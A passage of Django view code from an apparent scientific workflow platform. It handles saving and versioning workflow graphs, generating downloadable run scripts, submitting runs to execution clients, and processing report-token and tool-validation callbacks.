        return identifier.replace('__null', edit_suffix).replace('root__', name_prefix)

    # Get the root workflow node: the single workflow node with no edit yet.
    # NOTE(review): these asserts vanish under `python -O`; the callers are
    # expected to pass a graph freshly produced by the UI.
    new_worfklow_node = [x for x in cy['elements']['nodes'] if x['data']['type']=='workflow' and not x['data']['edit']]
    assert len(new_worfklow_node) == 1
    assert new_worfklow_node[0]['data']['name'] == 'root'
    # Set the edit value
    new_worfklow_node[0]['data']['edit'] = edit
    # Set the label value
    new_worfklow_node[0]['data']['label'] = workflow_label_cytoscape(None, workflow_info_name, edit)
    # All nodes that used to belong to the placeholder root now belong to the
    # named workflow. The same dict object is shared, as before.
    belongto = {
        'name': workflow_info_name,
        'edit': edit,
    }
    belongto_id = create_workflow_id(belongto)
    for node in cy['elements']['nodes']:
        if not node['data']['belongto'] is None:
            if not node['data']['belongto']['edit']:
                node['data']['belongto'] = belongto
        if 'name' in node['data']:
            if node['data']['name'] == 'root':
                node['data']['name'] = workflow_info_name
        node['data']['id'] = retarget(node['data']['id'])
        # Change the bash
        if 'bash' in node['data']:
            node['data']['bash'] = retarget(node['data']['bash'])
        # steps / inputs / outputs are lists of ids; rewrite each entry in place
        for list_key in ('steps', 'inputs', 'outputs'):
            if list_key in node['data']:
                id_list = node['data'][list_key]
                for i, entry in enumerate(id_list):
                    id_list[i] = retarget(entry)
    if 'edges' in cy['elements']:
        for edge in cy['elements']['edges']:
            edge['data']['source'] = retarget(edge['data']['source'])
            edge['data']['target'] = retarget(edge['data']['target'])
            if '__null' in edge['data']['id']:
                # Source/target were rewritten above, so rebuilding the edge
                # id from them yields the updated id
                edge['data']['id'] = create_workflow_edge_id(edge['data']['source'], edge['data']['target'])
def check_workflow_step_main(cy, root_workflow):
    '''
    Count the "main" steps that belong directly to root_workflow.
    It should be one and only one main step on the main workflow;
    the caller is responsible for checking the returned count.
    '''
    return sum(
        1
        for node in cy['elements']['nodes']
        if node['data']['type'] == 'step'
        and node['data']['belongto'] == root_workflow
        and node['data']['main']
    )
@has_data
def workflows_add(request, **kwargs):
    '''
    add workflow, workflow add, save workflow, workflow save, save wf
    edit workflow edit update workflow

    Create a new Workflow edit, or replace an existing *draft* edit.
    When kwargs['workflow_edit_state'] is True, the existing draft Workflow
    row is deleted and re-created under the same name/edit, while preserving
    its comment thread, votes, fork relations and created_at timestamp.
    Returns success(...) with display data, or fail(...) with a message.
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Please login to create new workflow')
    if not user_is_validated(request):
        return fail('Please validate your email to create new workflows ' + validate_toast_button());
    obc_user = OBC_user.objects.get(user=request.user)
    workflow_info_name = kwargs.get('workflow_info_name', '')
    if not workflow_info_name.strip():
        return fail('Invalid workflow name')
    workflow_info_forked_from = kwargs['workflow_info_forked_from'] # If it does not exist, it should raise an Exception
    workflow_edit_state = kwargs.get('workflow_edit_state', '')
    if not type(workflow_edit_state) is bool:
        return fail('Error 4877')
    upvoted = False
    downvoted = False
    workflow_forked_from = None
    workflow_changes = None
    if workflow_edit_state:
        # We are editing this workflow
        # Get the edit (version number)
        workflow_info_edit = kwargs.get('workflow_info_edit', '')
        # Is this an int?
        try:
            workflow_info_edit = int(workflow_info_edit)
        except ValueError as e:
            return fail('Error 4878')
        # Does this workflow exist?
        try:
            w = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 4879')
        # Basic sanity check. We shouldn't be able to edit a workflow which is not a draft..
        if not w.draft:
            return fail('Error 4880')
        # Is the creator of the workflow the same as the user who edits it?
        if obc_user != w.obc_user:
            return fail('Error 4881')
        # Store a reference to the comments (re-attached to the new row below)
        comment = w.comment
        # Store upvotes/downvotes
        upvotes = w.upvotes
        downvotes = w.downvotes
        # Store votes
        votes = UpDownWorkflowVote.objects.filter(workflow=w)
        # Disassociate the votes from this workflow (it is about to be deleted)
        # and remember the current user's upvoted/downvoted status
        for vote in votes:
            if vote.obc_user == obc_user:
                upvoted = vote.upvote
                downvoted = not upvoted
            vote.workflow = None
            vote.save()
        # Get the workflows that are forks of this workflow
        workflow_forks = Workflow.objects.filter(forked_from=w)
        # Temporarily set that these workflows are not forked from any workflow
        for workflow_fork in workflow_forks:
            workflow_fork.forked_from = None
            workflow_fork.save()
        # Get the workflow that this workflow is forked from
        workflow_forked_from = w.forked_from
        # Get the created_at. It needs to be sorted according to this, otherwise the jstree becomes messy
        workflow_created_at = w.created_at
        # Get the workflows that use this workflow
        workflows_using_this_workflow = Workflow.objects.filter(workflows__in = [w])
        # Remove this workflow from these workflows
        for workflow_using_this_workflow in workflows_using_this_workflow:
            workflow_using_this_workflow.workflows.remove(w)
            workflow_using_this_workflow.save()
        # Delete it! (re-created below under the same name/edit)
        w.delete()
    else:
        # This is a new workflow
        upvotes = 0
        downvotes = 0
        workflow_changes = kwargs.get('workflow_changes', None)
        if workflow_info_forked_from:
            # A fork requires a non-empty edit summary
            if not workflow_changes:
                return fail('Edit Summary cannot be empty')
            workflow_forked_from = Workflow.objects.get(name=workflow_info_forked_from['name'], edit=workflow_info_forked_from['edit'])
        else:
            pass # Do nothing
    workflow_website = kwargs.get('workflow_website', '')
    if workflow_website:
        if not valid_url(workflow_website):
            return fail('website is not a valid URL')
    workflow_description = kwargs.get('workflow_description', '')
    if not workflow_description.strip():
        return fail('Description cannot be empty')
    workflow_description_html = markdown(workflow_description)
    workflow = kwargs.get('workflow_json', '')
    if not workflow:
        return fail ('workflows json object is empty') # This should never happen!
    if not workflow['elements']:
        return fail('workflow graph cannot be empty')
    # Client sents the root workflow node.
    # When we save we make root False so that it is easier to import it later
    #workflow_root_node = [x for x in workflow['elements']['nodes'] if x['data']['type']=='workflow' and x['data']['root']]
    #if len(workflow_root_node) != 1:
    #    return fail('Error 28342')
    #workflow_root_node[0]['data']['root'] = False
    # Determine the edit (version) number under which this workflow is saved
    if workflow_edit_state:
        next_edit = workflow_info_edit
    else:
        #Get the maximum version. FIXME DUPLICATE CODE
        workflow_all = Workflow.objects.filter(name__iexact=workflow_info_name)
        if not workflow_all.exists():
            next_edit = 1
        else:
            max_edit = workflow_all.aggregate(Max('edit'))
            next_edit = max_edit['edit__max'] + 1
    #Change the edit value in the cytoscape json object
    set_edit_to_cytoscape_json(workflow, next_edit, workflow_info_name)
    #Check that one and only one step is main
    main_counter = check_workflow_step_main(workflow, {'name':workflow_info_name, 'edit': next_edit })
    if main_counter == 0:
        return fail('Could not find main step. One step needs to be declared as "main"')
    if main_counter > 1:
        return fail('Error 49188') # This should never happen
    new_workflow = Workflow(
        obc_user=obc_user,
        name = workflow_info_name,
        edit = next_edit,
        website = workflow_website,
        description = workflow_description,
        description_html = workflow_description_html,
        # FIXME !! SERIOUS!
        # This is redundand. We do json.loads and then json.dumps.
        # On the other hand, how else can we check if elements are not empty? (perhaps on the backend..)
        workflow = simplejson.dumps(workflow),
        forked_from = workflow_forked_from,
        changes = workflow_changes,
        upvotes = upvotes,
        downvotes = downvotes,
        draft = True, # We always save new workflows as draft.
    )
    #Save it
    new_workflow.save()
    if workflow_edit_state:
        # Preserve the created_at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
        new_workflow.created_at = workflow_created_at
        new_workflow.save()
    # Get all tools that are used in this workflow except the ones that are disconnected
    tool_nodes = [x for x in workflow['elements']['nodes'] if (x['data']['type'] == 'tool') and (not x['data']['disconnected'])]
    tools = [Tool.objects.get(name=x['data']['name'], version=x['data']['version'], edit=x['data']['edit']) for x in tool_nodes]
    if tools:
        new_workflow.tools.add(*tools)
        new_workflow.save()
    # Get all workflows that are used in this workflow
    workflow_nodes = [x for x in workflow['elements']['nodes'] if x['data']['type'] == 'workflow']
    # Remove self workflow and workflows that are disconnected
    workflow_nodes = [
        {'name': x['data']['name'], 'edit': x['data']['edit']}
        for x in workflow_nodes if
        (not (x['data']['name'] == workflow_info_name and x['data']['edit'] == next_edit)) and (not x['data']['disconnected'])
    ]
    # Get workflow database objects
    workflows = [Workflow.objects.get(**x) for x in workflow_nodes]
    if workflows:
        new_workflow.workflows.add(*workflows)
        new_workflow.save()
    # Add keywords
    keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['workflow_keywords']]
    new_workflow.keywords.add(*keywords)
    new_workflow.save();
    obc_user = OBC_user.objects.get(user=request.user)
    if workflow_edit_state:
        # Add the votes from the previous edit
        for vote in votes:
            vote.workflow = new_workflow
            vote.save()
        # Add the workflows that were forked from this workflow (that was deleted before) to the new workflow
        for workflow_fork in workflow_forks:
            workflow_fork.forked_from = new_workflow
            workflow_fork.save()
        # Add to the workflows that were using this workflow, the new workflow
        for workflow_using_this_workflow in workflows_using_this_workflow:
            workflow_using_this_workflow.workflows.add(new_workflow)
            workflow_using_this_workflow.save()
        # Update the json graph of the workflows that are using me
        WJ = WorkflowJSON()
        WJ.update_workflow(new_workflow)
    else:
        # Add an empty comment. This will be the root comment for the QA thread
        comment = Comment(
            obc_user = obc_user,
            comment = '',
            comment_html = '',
            title = markdown('Discussion on Workflow: w/{}/{}'.format(workflow_info_name, next_edit)),
            parent = None,
            upvotes = 0,
            downvotes = 0,
        )
        comment.save()
    new_workflow.comment = comment
    new_workflow.save()
    ret = {
        'description_html': workflow_description_html,
        'edit': next_edit,
        'created_at': datetime_to_str(new_workflow.created_at),
        'score': upvotes-downvotes,
        'voted': {'up': upvoted, 'down': downvoted},
        'workflow_pk': new_workflow.pk, # Used in comments
        'workflow_thread': qa_create_thread(new_workflow.comment, obc_user), # Tool comment thread
    }
    return success(ret)
@has_data
def workflows_search_3(request, **kwargs):
    '''
    This is triggered when a user drags a workflow from the jstree and drops it in a current workflow.
    Returns the full workflow record (graph JSON, metadata, comment thread, vote state).
    '''
    workflow_name = kwargs['workflow_name']
    workflow_edit = kwargs['workflow_edit']
    workflow = Workflow.objects.get(name__iexact = workflow_name, edit=workflow_edit)
    # Get current obc_user (None for anonymous visitors; everyone may read workflows)
    if request.user.is_anonymous:
        obc_user = None
    else:
        obc_user = OBC_user.objects.get(user=request.user)
    # Is it voted by the current user?
    if obc_user:
        try:
            v = UpDownWorkflowVote.objects.get(obc_user=obc_user, workflow=workflow)
        except ObjectDoesNotExist as e:
            # It is not voted
            workflow_voted = {'up': False, 'down': False}
        else:
            # It is voted
            workflow_voted = {'up': v.upvote, 'down': not v.upvote}
    else:
        workflow_voted = {'up': False, 'down': False}
    ret = {
        'username': workflow.obc_user.user.username,
        'website': workflow.website,
        'description': workflow.description,
        'description_html': workflow.description_html,
        'created_at': datetime_to_str(workflow.created_at),
        'forked_from': workflow_to_json(workflow.forked_from),
        'keywords': [keyword.keyword for keyword in workflow.keywords.all()],
        'workflow' : simplejson.loads(workflow.workflow),
        'changes': workflow.changes,
        'workflow_pk': workflow.pk, # Used in comments (QAs)
        'workflow_thread': qa_create_thread(workflow.comment, obc_user), # Workflow comment thread
        'workflow_score': workflow.upvotes - workflow.downvotes,
        'workflow_voted': workflow_voted,
        'workflow_comment_id': workflow.comment.pk, # Used to create a permalink to the comments
        'workflow_comment_title': workflow.comment.title,
        'workflow_comment_created_at': datetime_to_str(workflow.comment.created_at),
        'workflow_comment_username': workflow.comment.obc_user.user.username,
        'draft': workflow.draft, # Is this a draft workflow?
    }
    return success(ret)
def workflow_node_cytoscape(workflow, name='root', edit=0):
    '''
    Create a cytoscape workflow node.
    Normally it should take a database workflow object and create a cytoscape node.
    Currently it only builds a root workflow cytoscape node, so *workflow*
    must be falsy (passing a real object is not yet implemented).
    '''
    assert not workflow # Not yet implemented
    data = {
        'belongto': None,
        'edit': edit,
        'id': workflow_id_cytoscape(workflow, name, edit),
        'label': workflow_label_cytoscape(workflow, name, edit),
        'name': name,
        'type': 'workflow',
        # The two keys below exist only for consistency with other node
        # types; their values make no real difference here.
        'draft': False,
        'disconnected': False,
    }
    return {'data': data}
def tool_node_cytoscape(tool, tool_depending_from_me=None):
    '''
    Create a cytoscape tool node.
    tool: either a database Tool object or a plain dict with equivalent fields
    tool_depending_from_me: If I was added as a dependency, this should be the tool that depends from me. FIXME: REMOVE THIS
    NOTE(review): if tool is neither a Tool instance nor a dict the function
    implicitly returns None — presumably callers always pass one of the two;
    verify before relying on this.
    '''
    if isinstance(tool, Tool):
        # Database object: values come from model attributes / related managers
        return {
            'data': {
                'belongto': {'name': 'root', 'edit': 0},
                'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # Not used in executor
                'edit': tool.edit,
                'id': tool_id_cytoscape(tool),
                'label': tool_label_cytoscape(tool),
                'name': tool.name,
                'root': 'yes' if tool_depending_from_me else 'no', # Not used in executor. 'yes/no' should be True/False for Christ sake! FIXME
                'text': tool_label_cytoscape(tool),
                'type': 'tool',
                'variables': [{'description': variable.description, 'name': variable.name, 'type': 'variable', 'value': variable.value} for variable in tool.variables.all()],
                'installation_commands': tool.installation_commands,
                'validation_commands': tool.validation_commands,
                'os_choices': [choice.os_choices for choice in tool.os_choices.all()],
                'dependencies': [str(t) for t in tool.dependencies.all()],
                'version': tool.version,
                'draft': tool.draft,
            }
        }
    elif type(tool) is dict:
        # Plain dict (e.g. an unsaved tool built by download_tool): values come from keys
        return {
            'data': {
                'belongto': {'name': 'root', 'edit': 0},
                'dep_id' : tool_id_cytoscape(tool_depending_from_me) if tool_depending_from_me else '#', # See comment above. Not used in executor
                'edit': tool['edit'],
                'id': tool_id_cytoscape(tool),
                'label': tool_label_cytoscape(tool),
                'name': tool['name'],
                'root' : 'yes' if tool_depending_from_me else 'no', # Not used in executor,
                'text': tool_label_cytoscape(tool),
                'type': 'tool',
                'variables': [{'description': variable['description'], 'name': variable['name'], 'type': 'variable', 'value': variable['value']} for variable in tool['variables']],
                'version': tool['version'],
                'draft': tool['draft'],
                'installation_commands': tool['installation_commands'],
                'validation_commands': tool['validation_commands'],
                'os_choices': tool['os_choices'],
                'dependencies': tool['dependencies'],
            }
        }
def step_node_cytoscape(name='main'):
    '''
    Create a cytoscape step node.
    NOTE: the node produced is always the hard-coded 'main' step of the
    root workflow; the *name* parameter is currently not used.
    '''
    data = {
        'bash': '',
        'belongto': {'name': 'root', 'edit': 0},
        'id': step_id_cytoscape('main', None, 'root', None),
        'label': step_id_label('main'),
        'inputs': [],
        'outputs': [],
        'steps': [],
        'tools': [],
        'main': True,
        'name': step_id_label('main'),
        'sub_main': False,
        'type': 'step',
    }
    return {'data': data}
def edge_cytoscape(source, target):
    '''
    Create a cytoscape edge object connecting two cytoscape nodes.
    source/target: cytoscape node objects (dicts with a 'data' entry).
    '''
    source_id = source['data']['id']
    target_id = target['data']['id']
    edge = {
        'data': {
            'source': source_id,
            'target': target_id,
            'id': create_workflow_edge_id(source_id, target_id),
        },
        'position': {
            'x': 0,
            'y': 0,
        },
        'group': 'edges',
        'removed': False,
        'selected': False,
        'selectable': True,
        'locked': False,
        'grabbable': True,
        'classes': '',
    }
    return edge
@has_data
def download_tool(request, **kwargs):
    '''
    Create a cytoscape workflow that installs a given tool.
    Kind of a "fake" workflow: the only thing that it does is install a tool
    (and its dependencies).
    It is called by download_workflow when the user selects to "download" a
    tool instead of a workflow.
    '''
    workflow = {
        'elements': {
            'nodes': [],
            'edges': [],
        }
    }
    # Add the root workflow node
    workflow_node = workflow_node_cytoscape(None)
    workflow['elements']['nodes'].append(workflow_node)
    # This does not contain recursively all the dependencies. Only the first level.
    root_tool_dependencies = kwargs['tool_dependencies']
    root_tool_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=t['edit']) for t in root_tool_dependencies]
    all_dependencies_str = list(map(str, root_tool_objects))
    # Add this tool. Placeholder name 'T', version '0' and edit 0 are used for
    # tools that are still editable (not yet saved).
    tool = {
        'name': str(kwargs['tools_search_name']) if str(kwargs['tools_search_name']) else 'T',
        'version': str(kwargs['tools_search_version']) if str(kwargs['tools_search_version']) else '0',
        'edit': kwargs['tools_search_edit'] if kwargs['tools_search_edit'] else 0, # If this is editable, then the edit is 0
        'variables': [variable for variable in kwargs['tool_variables'] if variable['name'] and variable['value'] and variable['description']],
        'draft': kwargs['tool_draft'],
        'installation_commands': kwargs['tool_installation_commands'],
        'validation_commands': kwargs['tool_validation_commands'],
        'os_choices': kwargs['tool_os_choices'],
        'dependencies': all_dependencies_str,
    }
    this_tool_cytoscape_node = tool_node_cytoscape(tool)
    workflow['elements']['nodes'].append(this_tool_cytoscape_node)
    # Add an edge between the root workflow and this tool
    workflow['elements']['edges'].append(edge_cytoscape(workflow_node, this_tool_cytoscape_node))
    # Build all tool nodes for dependency tools.
    # all_ids guarantees that each node id appears only once in the graph,
    # even when the same tool is reachable through multiple dependency paths.
    all_ids = set()
    for root_tool_obj in root_tool_objects:
        # Get all dependencies recursively for this first-level dependency
        root_tool_all_dependencies = tool_get_dependencies_internal(root_tool_obj, include_as_root=True)
        for root_tool_all_dependency in root_tool_all_dependencies:
            # For each dependency create a cytoscape node
            cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'])
            if not cytoscape_node['data']['id'] in all_ids:
                # FIX: record the id so duplicated dependencies are added only once.
                # Previously all_ids was never populated, so the check was a no-op
                # (this was the "FIXME all_ids is always empty!" in the old code).
                all_ids.add(cytoscape_node['data']['id'])
                workflow['elements']['nodes'].append(cytoscape_node)
            # Connect this tool with its dependent tool node
            if root_tool_all_dependency['dependant']:
                workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, tool_node_cytoscape(root_tool_all_dependency['dependant'])))
            else:
                # This is a dependency of the root tool!
                workflow['elements']['edges'].append(edge_cytoscape(cytoscape_node, this_tool_cytoscape_node))
    # Create a step node
    step_node = step_node_cytoscape('main')
    workflow['elements']['nodes'].append(step_node)
    # Connect it with the root workflow
    workflow['elements']['edges'].append(edge_cytoscape(workflow_node, step_node))
    # Delegate the actual packaging/report handling to download_workflow
    return download_workflow(request, **{
        'workflow_options': {},
        'workflow': None,
        'download_type': kwargs.get('download_type', 'BASH'),
        'workflow_cy': workflow,
        'workflow_info_editable': False,
    })
@has_data
def download_workflow(request, **kwargs):
    '''
    Defined in urls.py:
    path('download_workflow/', views.download_workflow), # Accepts a workflow_options and workflow object. Runs a workflow
    https://docs.djangoproject.com/en/2.2/ref/request-response/#telling-the-browser-to-treat-the-response-as-a-file-attachment
    kwargs['workflow'] = {'name': <workflow_name>, 'edit': <workflow_edit>}
    kwargs['workflow_cy'] is the cytoscape workflow
    Note: Everyone can download a workflow!
    Serializes the workflow in the requested download_type format and, for
    validated users downloading a saved non-draft workflow, creates a Report
    with a fresh single-use token.
    '''
    workflow_arg = kwargs['workflow']
    workflow_options_arg = kwargs['workflow_options']
    download_type = kwargs['download_type'] # For a full list of types see below . if download_type == ...
    workflow_info_editable = kwargs['workflow_info_editable'] # Is this workflow saved or not? TRUE: NOT SAVED
    workflow_id = kwargs.get('workflow_id')
    workflow_obc_client = kwargs.get('obc_client', False)
    if workflow_info_editable:
        # This workflow has not been saved!
        workflow = kwargs.get('workflow_json', '')
        workflow_name = workflow_arg.get('name', '')
        if not workflow_name:
            workflow_name = 'W'
        workflow_edit = 0
        set_edit_to_cytoscape_json(workflow, workflow_edit, workflow_name)
        main_counter = check_workflow_step_main(workflow, {'name':workflow_name, 'edit': workflow_edit})
        if main_counter == 0:
            return fail('Could not find main step. One step needs to be declared as "main"')
        if main_counter > 1:
            return fail('Error 49188') # This should never happen
        workflow_cy = workflow
        workflow = None
    elif workflow_arg:
        # This is a saved workflow
        workflow = Workflow.objects.get(**workflow_arg)
        workflow_cy = simplejson.loads(workflow.workflow)
    else:
        # This is a tool run (called from download_tool)
        workflow = None
        workflow_cy = kwargs['workflow_cy']
    # Create a new Report object (only for validated users on saved, non-draft workflows)
    if (not user_is_validated(request)) or (not workflow) or (workflow.draft):
        '''
        If :
            user is anonymous or
            with non-validated email or
            not saved workflow or
            this is a tool run (workflow is None) or
            workflow is draft
        then:
            we do not create a report!
        '''
        run_report = None
        nice_id = None
        token = None
        report_created = False # Do we create a report upon execution of this workflow?
    else:
        run_report = Report(
            obc_user = OBC_user.objects.get(user=request.user),
            workflow = workflow,
        )
        # Attach a new report_id to it
        run_report.save()
        nice_id = str(run_report.nice_id)
        report_token = ReportToken(status=ReportToken.UNUSED, active=True)
        report_token.save()
        run_report.tokens.add(report_token)
        run_report.save()
        token = str(report_token.token)
        report_created = True
    # The object handed to the executor: arguments + graph + report identity
    output_object = {
        'arguments': workflow_options_arg,
        'workflow': workflow_cy,
        'token': token,
        'nice_id': nice_id,
    }
    ret = {}
    server_url = get_server_url(request)
    # Serialize to the requested format; results are URL-quoted, presumably
    # so the frontend can embed them as a downloadable file (see urls.py note).
    try:
        if download_type == 'JSON':
            output_object = urllib.parse.quote(simplejson.dumps(output_object))
            ret['output_object'] = output_object
        elif download_type == 'BASH':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'sh'))
            ret['output_object'] = output_object
        elif download_type == 'CWLTARGZ':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwltargz'))
            ret['output_object'] = output_object
        elif download_type == 'CWLZIP':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'cwlzip',))
            ret['output_object'] = output_object
        elif download_type == 'AIRFLOW':
            output_object = urllib.parse.quote(create_bash_script(output_object, server_url, 'airflow', workflow_id=workflow_id, obc_client=workflow_obc_client))
            ret['output_object'] = output_object
    except OBC_Executor_Exception as e:
        return fail(str(e))
    ret['report_created'] = report_created
    ret['nice_id'] = nice_id
    return success(ret)
def callback_url(request):
    '''
    Build the callback URL that execution clients use to reach this server.
    '''
    # Use double quotes for the dict key: same-type nested quotes inside an
    # f-string are a SyntaxError before Python 3.12 (PEP 701 relaxed this).
    return f'{request.scheme}://{request.META["HTTP_HOST"]}/platform/'
@has_data
def run_workflow(request, **kwargs):
    '''
    path('run_workflow/', view.run_workflow)
    curl -H "Content-Type: application/json" --request POST --data '{"type":"workflow","name":"test", "edit": "2"}' "http://139.91.81.103:5000/3ee5ccfb744983968fb3e9735e4bb85d/run_workflow"
    source: Where the request came from. If it from rest then source='frontend'

    Submit a saved workflow to the user's execution client (profile_name)
    over HTTP and, on success, create a Report with client_status SUBMITTED.
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Error 3291. User is anonymous')
    if not user_is_validated(request):
        return fail('Error 3292. User is not validated ' + validate_toast_button());
    obc_user = OBC_user.objects.get(user=request.user)
    profile_name = kwargs.get('profile_name', '')
    if not str(profile_name):
        return fail('Error 3288. Invalid profile name')
    name = kwargs.get('name', '')
    if not str(name):
        return fail('Error 3289. Invalid workflow name')
    edit = kwargs.get('edit', '')
    try:
        edit = int(edit)
    except ValueError as e:
        return fail('Error 3290. Invalid workflow edit')
    # Get the execution client (profile) belonging to this user
    try:
        client = obc_user.clients.get(name=profile_name)
    except ObjectDoesNotExist as e:
        return fail('Error 3293. Could not get execution client.')
    # Get the workflow
    try:
        workflow = Workflow.objects.get(name=name, edit=edit)
    except ObjectDoesNotExist as e:
        return fail('Error 3294. Could not get Workflow object.')
    url = client.client
    run_url = urllib.parse.urljoin(url + '/', 'run') # https://stackoverflow.com/questions/8223939/how-to-join-absolute-and-relative-urls
    nice_id = create_nice_id()
    # Payload the client expects; 'callback' is where it reports status back
    data_to_submit = {
        'type': 'workflow',
        'name': name,
        'edit': edit,
        'callback': callback_url(request),
        'workflow_id': nice_id,
    }
    headers={ "Content-Type" : "application/json", "Accept" : "application/json"}
    '''
    Example of checking the state of a run on the client:
    curl --header "Content-Type: application/json" \
        --request GET \
        http://139.91.190.239:5000/cfa52d9df5a24345d9f740395e4e69e4/check/id/test
    [{"dag_id": "mitsos", "dag_run_url": "/admin/airflow/graph?dag_id=mitsos&execution_date=2020-02-28+13%3A16%3A42%2B00%3A00", "execution_date": "2020-02-28T13:16:42+00:00", "id": 2, "run_id": "manual__2020-02-28T13:16:42+00:00", "start_date": "2020-02-28T13:16:42.710933+00:00", "state": "success"}]
    '''
    # !!!HIGLY EXPERIMENTAL!!!
    try:
        r = requests.post(run_url, headers=headers, data=simplejson.dumps(data_to_submit))
    except requests.exceptions.ConnectionError as e:
        return fail('Could not establish a connection with client')
    if not r.ok:
        return fail('Could not send to URL: {} . Error code: {}'.format(run_url, r.status_code))
    try:
        data_from_client = r.json()
    except Exception as e: # Ideally we should do here: except json.decoder.JSONDecodeError as e: but we would have to import json with simplejson..
        return fail('Could not parse JSON data from Execution Client.')
    # Check data_from_client. We expect to find an externally triggered True in data_from_client['status']['message']
    if not 'status' in data_from_client:
        return fail('Client does not contains status info')
    if not 'message' in data_from_client['status']:
        return fail("Client's status does not contain any message")
    if not 'externally triggered: True' in data_from_client['status']['message']:
        return fail("Client failed to trigger DAG: {}".format(data_from_client['status']['message']))
    if not 'executor_url' in data_from_client:
        return fail("Could not get workflow monitoring URL..")
    visualization_url = g['create_client_airflow_url'](data_from_client['executor_url'], nice_id)
    if not 'monitor_url' in data_from_client:
        return fail('Could not get monitoring URL..')
    monitor_url = data_from_client['monitor_url']
    # All seem to be ok. Create a report
    report = Report(
        obc_user=obc_user,
        workflow = workflow,
        nice_id = nice_id,
        client=client,
        visualization_url=visualization_url,
        monitor_url = monitor_url,
        client_status='SUBMITTED')
    report.save()
    # Let's not create a reporttoken for now.
    ret = {
        'nice_id': nice_id,
    }
    return success(ret)
@csrf_exempt
@has_data
def report(request, **kwargs):
    '''
    Called from the executor with a one-time token and a new status.
    Consumes (deactivates) the presented token, records the status on the
    associated Report, and returns a fresh token for the next update.
    '''
    token = kwargs.get('token', None)
    if not token:
        return fail('Could not find token field')
    if not uuid_is_valid(token):
        return fail('bad token format')
    status_received = kwargs.get('status', None)
    if not status_received:
        return fail('Could not find status field')
    status_fields = ReportToken.parse_response_status(status_received)
    if status_fields is None:
        return fail('Unknown status: {}'.format(status_received))
    # Get the ReportToken
    try:
        old_report_token = ReportToken.objects.get(token=token)
    except ObjectDoesNotExist as e:
        return fail('Could not find entry to this token')
    if not old_report_token.active:
        return fail('This token has expired')
    # Deactivate it (tokens are single-use)
    old_report_token.active = False
    old_report_token.save()
    # Get the report this token belongs to
    report_obj = old_report_token.report_related.first()
    # Save the new status and return a new token
    new_report_token = ReportToken(status=status_received, active=True) # Duplicate code
    new_report_token.save()
    report_obj.tokens.add(new_report_token)
    report_obj.save()
    return success({'token': str(new_report_token.token)})
### END OF WORKFLOWS ###
### START OF VALIDATION CALLBACK ###
@has_data
def tool_validation_status(request, **kwargs):
    '''
    Called from the refresh button on Tool validation.
    Returns the status and captured output of the tool's most recent
    validation effort ('Unvalidated' when no effort exists yet).
    '''
    tool_argument = kwargs['tool']
    tool = Tool.objects.get(**tool_argument)
    ret = {
        'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
        'validation_created_at': datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
        'stderr':tool.last_validation.stderr if tool.last_validation else None,
        'stdout':tool.last_validation.stdout if tool.last_validation else None,
        'errcode':tool.last_validation.errcode if tool.last_validation else None,
    }
    return success(ret)
@has_data
def tool_info_validation_queued(request, **kwargs):
    '''
    This is called from angular in order to connect the controller id with the database tool.
    Records a 'Queued' ToolValidations entry bound to the controller task id
    and marks it as the tool's last_validation.
    '''
    if not 'payload' in kwargs:
        return fail('payload was not found on callback')
    payload = kwargs['payload']
    assert payload['status'] == 'Queued'
    tool = Tool.objects.get(**payload['tool'])
    this_id = payload['id']
    tv = ToolValidations(tool=tool, task_id=this_id, validation_status='Queued')
    tv.save()
    tool.last_validation = tv
    tool.save()
    return success({'last_validation': datetime_to_str(tv.created_at)})
@csrf_exempt
@has_data
def callback(request, **kwargs):
    '''
    Function called by controller.py with the result of a tool-validation task.

    Expects kwargs['payload'] with:
      * status: one of 'Running', 'Validated', 'Failed'
      * id: the controller task id that links back to the Tool being validated
      * stdout / stderr / errcode (optional): output of the validation run
    Stores a new ToolValidations record and marks it as the tool's last_validation.
    '''
    remote_address = request.META['REMOTE_ADDR']
    # Only accept callbacks from the known controller host.
    # NOTE(review): hard-coded IP whitelist; consider moving it to settings.
    if not remote_address in ['139.91.190.79']:
        return fail(f'Received callback from unknown remote address: {remote_address}')
    if not 'payload' in kwargs:
        return fail('payload was not found on callback')
    payload = kwargs['payload']
    if not 'status' in payload:
        return fail('status was not found on payload')
    status = payload['status']
    if not status in ['Running', 'Validated', 'Failed']:
        return fail(f'Unknown status: {status}')
    if not 'id' in payload:
        return fail('id was not found on payload')
    this_id = payload['id']
    # Get the stdout, stderr and error code.
    # These may be absent (None) while the task is still Queued or Running.
    stdout = payload.get('stdout', None)
    stderr = payload.get('stderr', None)
    errcode = payload.get('errcode', None)
    # Get the tool referring to this task_id
    tool = ToolValidations.get_tool_from_task_id(this_id)
    if tool is None:
        return fail(f'Could not find tool with task_id={this_id}')
    # Create a new ToolValidations entry for this status update
    tv = ToolValidations(tool=tool, task_id=this_id, validation_status=status, stdout= stdout, stderr= stderr, errcode= errcode)
    tv.save()
    # Assign tv to the tool as its most recent validation
    tool.last_validation = tv
    tool.save()
    return success()
def tools_show_stdout(request, tools_info_name, tools_info_version, tools_info_edit):
    '''
    Render the stdout of the last validation effort of a tool as HTML.
    URL :
    path(r'tool_stdout/[\\w]+/[\\w\\.]+/[\\d]+/', views.tools_show_stdout), # Show stdout of tool
    '''
    tool_repr = Tool.get_repr(tools_info_name, tools_info_version, tools_info_edit)
    try:
        tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=int(tools_info_edit))
    except ObjectDoesNotExist as e:
        return fail(f'Could not find tool: {tool_repr}')
    if not tool.last_validation:
        return fail(f'Could not find any validation effort for tool: {tool_repr}')
    if not tool.last_validation.stdout:
